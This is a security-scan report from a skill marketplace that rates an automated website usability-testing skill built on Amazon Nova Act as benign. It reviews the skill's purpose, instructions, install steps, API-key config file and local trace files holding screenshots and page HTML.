Skillv1.0.5

ClawScan security

Website Usability Test Nova Act · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignFeb 15, 2026, 7:49 AM

Verdict: benign
Confidence: medium
Model: gpt-5-mini
Summary: The skill's code, runtime instructions, and requested local config access line up with its stated purpose (automated usability testing using Amazon Nova Act); it primarily needs a Nova Act API key stored in a local config file and will capture local trace files (screenshots/HTML) which you should treat as sensitive.
Guidance: This skill appears to do what it says: run automated browser tests via Amazon Nova Act and produce reports. Before installing or running it: - Provide the Nova Act API key only in the designated config file (~/.openclaw/config/nova-act.json) and verify that path is correct for your system. - Run tests only against non-production/test environments — the scripts capture full page HTML and screenshots which may contain PII or sensitive data. - Review the shipped Python scripts yourself (or run them in an isolated container/VM) if you are concerned about data flow; look for any network calls beyond Nova Act and your local file writes. - Confirm you trust the upstream nova-act package (pip package) and review its provenance before installing. - If you need stronger containment, run the skill inside a disposable VM or container, and delete the generated trace directories after review. If you want, I can scan the included Python files for specific network calls or suspicious I/O patterns and point out any lines that warrant more scrutiny.

Review Dimensions

Purpose & Capability: okName/description match the packaged scripts and instructions. The skill needs Python and the Nova Act + Playwright libraries to perform browser automation and generate reports — these are proportional to a usability-testing tool. The only declared external credential surface is a local config file for the Nova Act API key, which is consistent with the described integration.
Instruction Scope: noteSKILL.md clearly instructs the agent to run collection scripts that capture page HTML, screenshots, and browser traces and then requires the agent to interpret results and generate reports. The skill intentionally writes local trace files that can include PII and full page contents — the README and SKILL.md warn about this. There are no obvious instructions that read or exfiltrate unrelated system secrets, but the agent will need to access the config path (~/.openclaw/config/nova-act.json) to read the API key.
Install Mechanism: okThere is no automatic install spec included; dependencies are installed via pip and Playwright per the README (pip3 install nova-act pydantic playwright; playwright install chromium). This is a typical/manual install flow and does not pull arbitrary binaries from unknown URLs. The included Python scripts are shipped with the skill (so code will run locally).
Credentials: noteThe only sensitive credential the skill needs is the Nova Act API key, which the skill expects to find in a local config file (/home/ubuntu/.openclaw/config/nova-act.json). No other environment variables or unrelated credentials are requested. Storing the API key in a local config file (instead of an env var) is a design choice and is consistent with the skill's needs, but you should confirm the config file's path is correct for your environment and protect that file.
Persistence & Privilege: okThe skill is not always:true and does not request elevated system privileges or modification of other skills. It creates local log/report files and may create a skill directory under ~/.openclaw/skills; this is normal for a local testing tool. No evidence of attempts to persist beyond its own files.